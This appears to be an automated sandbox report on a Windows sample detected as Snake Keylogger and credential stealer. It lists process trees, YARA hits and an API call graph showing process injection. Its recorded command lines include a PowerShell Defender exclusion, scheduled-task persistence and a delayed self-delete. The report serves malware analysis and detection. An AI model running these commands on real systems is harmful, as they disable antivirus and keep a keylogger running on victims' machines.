                                          server-timing: cfL4;desc="?proto=TCP&rtt=4749&min_rtt=4749&rtt_var=2374&sent=5&recv=7&lost=0&retrans=1&sent_bytes=4234&recv_bytes=699&delivery_rate=149368&cwnd=196&unsent_bytes=0&cid=33d502addb27c5c5&ts=195&x=0"
                                          2025-01-02 19:19:59 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:14:19:40
                                          Start date:02/01/2025
                                          Path:C:\Users\user\Desktop\file.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                          Imagebase:0x510000
                                          File size:698'376 bytes
                                          MD5 hash:92E84C83303CDC492EAAED0E1E4B79C6
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2186804007.0000000004263000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2186804007.0000000004263000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2186804007.0000000004263000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2186804007.0000000004263000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:3
                                          Start time:14:19:42
                                          Start date:02/01/2025
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aVmZDnwW.exe"
                                          Imagebase:0xa80000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:4
                                          Start time:14:19:43
                                          Start date:02/01/2025
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:5
                                          Start time:14:19:43
                                          Start date:02/01/2025
                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmp9FE1.tmp"
                                          Imagebase:0x840000
                                          File size:187'904 bytes
                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:6
                                          Start time:14:19:43
                                          Start date:02/01/2025
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:7
                                          Start time:14:19:43
                                          Start date:02/01/2025
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                          Imagebase:0xfb0000
                                          File size:45'984 bytes
                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.2269652870.0000000003321000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:8
                                          Start time:14:19:43
                                          Start date:02/01/2025
                                          Path:C:\Users\user\AppData\Roaming\aVmZDnwW.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\AppData\Roaming\aVmZDnwW.exe
                                          Imagebase:0x520000
                                          File size:698'376 bytes
                                          MD5 hash:92E84C83303CDC492EAAED0E1E4B79C6
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2233081731.0000000004118000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.2233081731.0000000004118000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.2233081731.0000000004118000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000008.00000002.2233081731.0000000004118000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                          Antivirus matches:
                                          • Detection: 100%, Joe Sandbox ML
                                          • Detection: 71%, ReversingLabs
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:9
                                          Start time:14:19:44
                                          Start date:02/01/2025
                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                          Imagebase:0x7ff6ef0c0000
                                          File size:496'640 bytes
                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:10
                                          Start time:14:19:47
                                          Start date:02/01/2025
                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmpB1B3.tmp"
                                          Imagebase:0x840000
                                          File size:187'904 bytes
                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:11
                                          Start time:14:19:47
                                          Start date:02/01/2025
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:12
                                          Start time:14:19:47
                                          Start date:02/01/2025
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                          Imagebase:0xe10000
                                          File size:45'984 bytes
                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.2314110382.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:13
                                          Start time:14:19:53
                                          Start date:02/01/2025
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                          Imagebase:0x790000
                                          File size:236'544 bytes
                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:14
                                          Start time:14:19:53
                                          Start date:02/01/2025
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:15
                                          Start time:14:19:53
                                          Start date:02/01/2025
                                          Path:C:\Windows\SysWOW64\choice.exe
                                          Wow64 process (32bit):true
                                          Commandline:choice /C Y /N /D Y /T 3
                                          Imagebase:0x350000
                                          File size:28'160 bytes
                                          MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:17
                                          Start time:14:19:58
                                          Start date:02/01/2025
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                          Imagebase:0x790000
                                          File size:236'544 bytes
                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:18
                                          Start time:14:19:58
                                          Start date:02/01/2025
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:19
                                          Start time:14:19:58
                                          Start date:02/01/2025
                                          Path:C:\Windows\SysWOW64\choice.exe
                                          Wow64 process (32bit):true
                                          Commandline:choice /C Y /N /D Y /T 3
                                          Imagebase:0x350000
                                          File size:28'160 bytes
                                          MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:12.7%
                                            Dynamic/Decrypted Code Coverage:99.1%
                                            Signature Coverage:3.9%
                                            Total number of Nodes:333
                                            Total number of Limit Nodes:21
                                            execution_graph 46332 29a79d8 46333 29a7a1e GetCurrentProcess 46332->46333 46335 29a7a69 46333->46335 46336 29a7a70 GetCurrentThread 46333->46336 46335->46336 46337 29a7aad GetCurrentProcess 46336->46337 46338 29a7aa6 46336->46338 46339 29a7ae3 46337->46339 46338->46337 46340 29a7b0b GetCurrentThreadId 46339->46340 46341 29a7b3c 46340->46341 46399 29a54f8 46403 29a55f0 46399->46403 46408 29a55e0 46399->46408 46400 29a5507 46404 29a5624 46403->46404 46405 29a5601 46403->46405 46404->46400 46405->46404 46406 29a5845 GetModuleHandleW 46405->46406 46407 29a5884 46406->46407 46407->46400 46409 29a5624 46408->46409 46410 29a5601 46408->46410 46409->46400 46410->46409 46411 29a5845 GetModuleHandleW 46410->46411 46412 29a5884 46411->46412 46412->46400 46068 28ea688 46069 28ea6cd CloseHandle 46068->46069 46070 28ea718 46069->46070 46342 28e0848 46343 28e085a 46342->46343 46346 28e8379 46343->46346 46347 28e838b 46346->46347 46348 28e0871 46347->46348 46351 28e98cf 46347->46351 46355 28e9908 46347->46355 46352 28e990b 46351->46352 46359 28e993f 46352->46359 46356 28e991f 46355->46356 46358 28e993f NtQueryInformationProcess 46356->46358 46357 28e9933 46357->46347 46358->46357 46360 28e9970 46359->46360 46364 28e99b0 46360->46364 46368 28e99a1 46360->46368 46361 28e9933 46361->46347 46365 28e99d4 46364->46365 46366 28e9b08 46365->46366 46372 28e07f4 46365->46372 46366->46361 46369 28e99b3 46368->46369 46370 28e07f4 NtQueryInformationProcess 46369->46370 46371 28e9b08 46369->46371 46370->46369 46371->46361 46373 28e9b70 NtQueryInformationProcess 46372->46373 46375 28e9c37 46373->46375 46375->46365 46376 29ac2d0 46377 29ac368 CreateWindowExW 46376->46377 46379 29ac4a6 46377->46379 46071 9987e94 46072 9987cf1 46071->46072 46073 9987cfa 46071->46073 46072->46073 46076 998a2b0 46072->46076 46097 998a2a0 46072->46097 46077 998a2ca 46076->46077 46078 998a2ee 46077->46078 46118 998a999 46077->46118 46129 998a7f8 46077->46129 46140 998aa45 46077->46140 46151 998a944 46077->46151 46156 998a761 46077->46156 46167 998aa80 46077->46167 46172 998a82b 46077->46172 46185 998a70a 46077->46185 46189 998a9ea 46077->46189 46194 998a969 46077->46194 46205 998ae16 46077->46205 46210 998a8f2 46077->46210 46214 998abb1 46077->46214 46219 998b07f 46077->46219 46230 998a77e 46077->46230 46241 998abdb 46077->46241 46246 998ab3a 46077->46246 46258 998a8b9 46077->46258 46078->46073 46098 998a2ca 46097->46098 46099 998a2ee 46098->46099 46100 998a7f8 6 API calls 46098->46100 46101 998a999 6 API calls 46098->46101 46102 998a8b9 2 API calls 46098->46102 46103 998ab3a 6 API calls 46098->46103 46104 998abdb 2 API calls 46098->46104 46105 998a77e 6 API calls 46098->46105 46106 998b07f 6 API calls 46098->46106 46107 998abb1 2 API calls 46098->46107 46108 998a8f2 2 API calls 46098->46108 46109 998ae16 2 API calls 46098->46109 46110 998a969 6 API calls 46098->46110 46111 998a9ea 2 API calls 46098->46111 46112 998a70a 2 API calls 46098->46112 46113 998a82b 8 API calls 46098->46113 46114 998aa80 2 API calls 46098->46114 46115 998a761 6 API calls 46098->46115 46116 998a944 2 API calls 46098->46116 46117 998aa45 6 API calls 46098->46117 46099->46073 46100->46099 46101->46099 46102->46099 46103->46099 46104->46099 46105->46099 46106->46099 46107->46099 46108->46099 46109->46099 46110->46099 46111->46099 46112->46099 46113->46099 46114->46099 46115->46099 46116->46099 46117->46099 46121 998a765 46118->46121 46119 998ae2d 46271 9987450 46119->46271 46275 9987448 46119->46275 46120 998ae4e 46121->46078 46121->46118 46121->46119 46122 998af78 46121->46122 46263 9987208 46121->46263 46267 9987200 46121->46267 46279 9986cd8 46121->46279 46283 9986ce0 46121->46283 46122->46078 46132 998a765 46129->46132 46130 998ae2d 46138 9987448 WriteProcessMemory 46130->46138 46139 9987450 WriteProcessMemory 46130->46139 46131 998ae4e 46132->46078 46132->46130 46133 998af78 46132->46133 46134 9987208 Wow64SetThreadContext 46132->46134 46135 9987200 Wow64SetThreadContext 46132->46135 46136 9986cd8 ResumeThread 46132->46136 46137 9986ce0 ResumeThread 46132->46137 46133->46078 46134->46132 46135->46132 46136->46132 46137->46132 46138->46131 46139->46131 46143 998a765 46140->46143 46141 998ae2d 46145 9987448 WriteProcessMemory 46141->46145 46146 9987450 WriteProcessMemory 46141->46146 46142 998ae4e 46143->46078 46143->46141 46144 998af78 46143->46144 46147 9987208 Wow64SetThreadContext 46143->46147 46148 9987200 Wow64SetThreadContext 46143->46148 46149 9986cd8 ResumeThread 46143->46149 46150 9986ce0 ResumeThread 46143->46150 46144->46078 46145->46142 46146->46142 46147->46143 46148->46143 46149->46143 46150->46143 46152 998abdf 46151->46152 46287 9987328 46152->46287 46291 9987330 46152->46291 46153 998abfd 46153->46078 46159 998a765 46156->46159 46157 998ae2d 46165 9987448 WriteProcessMemory 46157->46165 46166 9987450 WriteProcessMemory 46157->46166 46158 998ae4e 46159->46078 46159->46157 46160 998af78 46159->46160 46161 9986cd8 ResumeThread 46159->46161 46162 9986ce0 ResumeThread 46159->46162 46163 9987208 Wow64SetThreadContext 46159->46163 46164 9987200 Wow64SetThreadContext 46159->46164 46160->46078 46161->46159 46162->46159 46163->46159 46164->46159 46165->46158 46166->46158 46168 998aa16 46167->46168 46169 998aa18 46167->46169 46170 9987448 WriteProcessMemory 46168->46170 46171 9987450 WriteProcessMemory 46168->46171 46169->46078 46170->46169 46171->46169 46295 99875a0 46172->46295 46299 99875a8 46172->46299 46173 998ae2d 46177 9987448 WriteProcessMemory 46173->46177 46178 9987450 WriteProcessMemory 46173->46178 46174 998ae4e 46175 998a765 46175->46078 46175->46173 46176 998af78 46175->46176 46179 9987208 Wow64SetThreadContext 46175->46179 46180 9987200 Wow64SetThreadContext 46175->46180 46181 9986cd8 ResumeThread 46175->46181 46182 9986ce0 ResumeThread 46175->46182 46176->46078 46177->46174 46178->46174 46179->46175 46180->46175 46181->46175 46182->46175 46303 99877d8 46185->46303 46307 99877ce 46185->46307 46190 998aa16 46189->46190 46192 9987448 WriteProcessMemory 46190->46192 46193 9987450 WriteProcessMemory 46190->46193 46191 998aa18 46191->46078 46192->46191 46193->46191 46195 998a765 46194->46195 46195->46078 46196 998ae2d 46195->46196 46198 998af78 46195->46198 46199 9986cd8 ResumeThread 46195->46199 46200 9986ce0 ResumeThread 46195->46200 46201 9987208 Wow64SetThreadContext 46195->46201 46202 9987200 Wow64SetThreadContext 46195->46202 46203 9987448 WriteProcessMemory 46196->46203 46204 9987450 WriteProcessMemory 46196->46204 46197 998ae4e 46198->46078 46199->46195 46200->46195 46201->46195 46202->46195 46203->46197 46204->46197 46206 998ae1c 46205->46206 46208 9987448 WriteProcessMemory 46206->46208 46209 9987450 WriteProcessMemory 46206->46209 46207 998ae4e 46208->46207 46209->46207 46212 9987208 Wow64SetThreadContext 46210->46212 46213 9987200 Wow64SetThreadContext 46210->46213 46211 998a90c 46211->46078 46212->46211 46213->46211 46215 998abed 46214->46215 46216 998abfd 46215->46216 46217 9987328 VirtualAllocEx 46215->46217 46218 9987330 VirtualAllocEx 46215->46218 46216->46078 46217->46216 46218->46216 46220 998a765 46219->46220 46220->46078 46221 998ae2d 46220->46221 46223 998af78 46220->46223 46226 9987208 Wow64SetThreadContext 46220->46226 46227 9987200 Wow64SetThreadContext 46220->46227 46228 9986cd8 ResumeThread 46220->46228 46229 9986ce0 ResumeThread 46220->46229 46224 9987448 WriteProcessMemory 46221->46224 46225 9987450 WriteProcessMemory 46221->46225 46222 998ae4e 46223->46078 46224->46222 46225->46222 46226->46220 46227->46220 46228->46220 46229->46220 46235 9987208 Wow64SetThreadContext 46230->46235 46236 9987200 Wow64SetThreadContext 46230->46236 46231 998ae2d 46237 9987448 WriteProcessMemory 46231->46237 46238 9987450 WriteProcessMemory 46231->46238 46232 998a765 46232->46078 46232->46230 46232->46231 46234 998af78 46232->46234 46239 9986cd8 ResumeThread 46232->46239 46240 9986ce0 ResumeThread 46232->46240 46233 998ae4e 46234->46078 46235->46232 46236->46232 46237->46233 46238->46233 46239->46232 46240->46232 46242 998abdf 46241->46242 46244 9987328 VirtualAllocEx 46242->46244 46245 9987330 VirtualAllocEx 46242->46245 46243 998abfd 46243->46078 46244->46243 46245->46243 46247 998ab51 46246->46247 46248 998a765 46246->46248 46247->46078 46248->46078 46249 998ae2d 46248->46249 46251 998af78 46248->46251 46254 9986cd8 ResumeThread 46248->46254 46255 9986ce0 ResumeThread 46248->46255 46256 9987208 Wow64SetThreadContext 46248->46256 46257 9987200 Wow64SetThreadContext 46248->46257 46252 9987448 WriteProcessMemory 46249->46252 46253 9987450 WriteProcessMemory 46249->46253 46250 998ae4e 46251->46078 46252->46250 46253->46250 46254->46248 46255->46248 46256->46248 46257->46248 46259 998a8c6 46258->46259 46261 9987448 WriteProcessMemory 46259->46261 46262 9987450 WriteProcessMemory 46259->46262 46260 998aea4 46261->46260 46262->46260 46264 9987251 Wow64SetThreadContext 46263->46264 46266 99872c9 46264->46266 46266->46121 46268 998720a Wow64SetThreadContext 46267->46268 46270 99872c9 46268->46270 46270->46121 46272 998749c WriteProcessMemory 46271->46272 46274 9987535 46272->46274 46274->46120 46276 998749c WriteProcessMemory 46275->46276 46278 9987535 46276->46278 46278->46120 46280 9986d24 ResumeThread 46279->46280 46282 9986d70 46280->46282 46282->46121 46284 9986d24 ResumeThread 46283->46284 46286 9986d70 46284->46286 46286->46121 46288 9987332 VirtualAllocEx 46287->46288 46290 99873ec 46288->46290 46290->46153 46292 9987374 VirtualAllocEx 46291->46292 46294 99873ec 46292->46294 46294->46153 46296 99875f4 ReadProcessMemory 46295->46296 46298 998766c 46296->46298 46298->46175 46300 99875f4 ReadProcessMemory 46299->46300 46302 998766c 46300->46302 46302->46175 46304 998785f CreateProcessA 46303->46304 46306 9987ab4 46304->46306 46308 998785f CreateProcessA 46307->46308 46310 9987ab4 46308->46310 46380 9941bd8 46382 9941c12 46380->46382 46381 9941ca3 46382->46381 46386 9941cd0 46382->46386 46390 9941cc0 46382->46390 46383 9941c99 46387 9942155 46386->46387 46388 9941cfe 46386->46388 46387->46383 46388->46387 46394 99426e0 46388->46394 46391 9941cfe 46390->46391 46392 9942155 46390->46392 46391->46392 46393 99426e0 CreateIconFromResourceEx 46391->46393 46392->46383 46393->46392 46398 99426fa 46394->46398 46395 9942707 46395->46387 46396 994277c CreateIconFromResourceEx 46397 9942805 46396->46397 46397->46387 46398->46395 46398->46396 46311 998b508 46312 998b693 46311->46312 46314 998b52e 46311->46314 46314->46312 46315 9983ec8 46314->46315 46316 998b7e0 PostMessageW 46315->46316 46317 998b88d 46316->46317 46317->46314 46413 e8d01c 46414 e8d034 46413->46414 46415 e8d08e 46414->46415 46420 29ac558 46414->46420 46424 29ab02c 46414->46424 46433 29ad388 46414->46433 46442 29ac568 46414->46442 46421 29ac58e 46420->46421 46422 29ab02c CallWindowProcW 46421->46422 46423 29ac5af 46422->46423 46423->46415 46425 29ab037 46424->46425 46426 29ad3f9 46425->46426 46428 29ad3e9 46425->46428 46429 29ad3f7 46426->46429 46462 29ab154 46426->46462 46446 29ad511 46428->46446 46451 29ad520 46428->46451 46456 29ad5ec 46428->46456 46436 29ad3c5 46433->46436 46434 29ad3f9 46435 29ab154 CallWindowProcW 46434->46435 46438 29ad3f7 46434->46438 46435->46438 46436->46434 46437 29ad3e9 46436->46437 46439 29ad5ec CallWindowProcW 46437->46439 46440 29ad520 CallWindowProcW 46437->46440 46441 29ad511 CallWindowProcW 46437->46441 46439->46438 46440->46438 46441->46438 46443 29ac58e 46442->46443 46444 29ab02c CallWindowProcW 46443->46444 46445 29ac5af 46444->46445 46445->46415 46448 29ad522 46446->46448 46447 29ad5c0 46447->46429 46466 29ad5d8 46448->46466 46469 29ad5c8 46448->46469 46453 29ad534 46451->46453 46452 29ad5c0 46452->46429 46454 29ad5d8 CallWindowProcW 46453->46454 46455 29ad5c8 CallWindowProcW 46453->46455 46454->46452 46455->46452 46457 29ad5fa 46456->46457 46458 29ad5aa 46456->46458 46460 29ad5d8 CallWindowProcW 46458->46460 46461 29ad5c8 CallWindowProcW 46458->46461 46459 29ad5c0 46459->46429 46460->46459 46461->46459 46463 29ab15f 46462->46463 46464 29aeada CallWindowProcW 46463->46464 46465 29aea89 46463->46465 46464->46465 46465->46429 46467 29ad5e9 46466->46467 46472 29aea1d 46466->46472 46467->46447 46470 29ad5e9 46469->46470 46471 29aea1d CallWindowProcW 46469->46471 46470->46447 46471->46470 46473 29ab154 CallWindowProcW 46472->46473 46474 29aea2a 46473->46474 46474->46467 46322 28ee838 46324 28ee85f 46322->46324 46323 28ee93c 46324->46323 46326 28ee404 46324->46326 46327 28ef8f0 CreateActCtxA 46326->46327 46329 28ef9f6 46327->46329 46475 28e8278 46476 28e82c5 VirtualProtect 46475->46476 46477 28e8331 46476->46477 46330 29a7c20 DuplicateHandle 46331 29a7cfd 46330->46331 46318 28ea590 46319 28ea5da OutputDebugStringW 46318->46319 46321 28ea63c 46319->46321

                                            Executed Functions

                                            Function 0A0A9EE8 Relevance: 15.1, Strings: 10, Instructions: 2604COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (ocq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4|hq$4|hq$$cq
                                            • API String ID: 0-1037649440
                                            • Opcode ID: f4b31db8ded14a6bda311a38781537db7844c620b234a4c67971d9ff445b8dd1
                                            • Instruction ID: 8e8281ec339094ad3e51fbd92007d880e2793ec9a362ef4d09b9dc23d6497dd2
                                            • Opcode Fuzzy Hash: f4b31db8ded14a6bda311a38781537db7844c620b234a4c67971d9ff445b8dd1
                                            • Instruction Fuzzy Hash: 1D43FA74A11219DFDB64DFA8C898A9DB7B2FF59300F168199D409AB3A1DB34ED81CF40
                                            Function 0994A0F0 Relevance: 10.8, Strings: 8, Instructions: 793COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191264997.0000000009940000.00000040.00000800.00020000.00000000.sdmp, Offset: 09940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9940000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LRcq$LRcq$$cq$$cq$$cq$$cq$$cq$$cq
                                            • API String ID: 0-765342939
                                            • Opcode ID: 6e0269b5cdc7466dc95957c0f4b23d4d2ec56ca1d32359f0d669c48872d286d3
                                            • Instruction ID: 0f58a977bc725af9b8565e8529435175315dfff2f4ccef5328d8b8d71f8a896c
                                            • Opcode Fuzzy Hash: 6e0269b5cdc7466dc95957c0f4b23d4d2ec56ca1d32359f0d669c48872d286d3
                                            • Instruction Fuzzy Hash: 5C621330A4A255CFCB16CF68D945AAEBBF1FF45301F14856BE455DB2A2D338C881CB92
                                            Function 09941CD0 Relevance: 8.2, Strings: 6, Instructions: 676COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
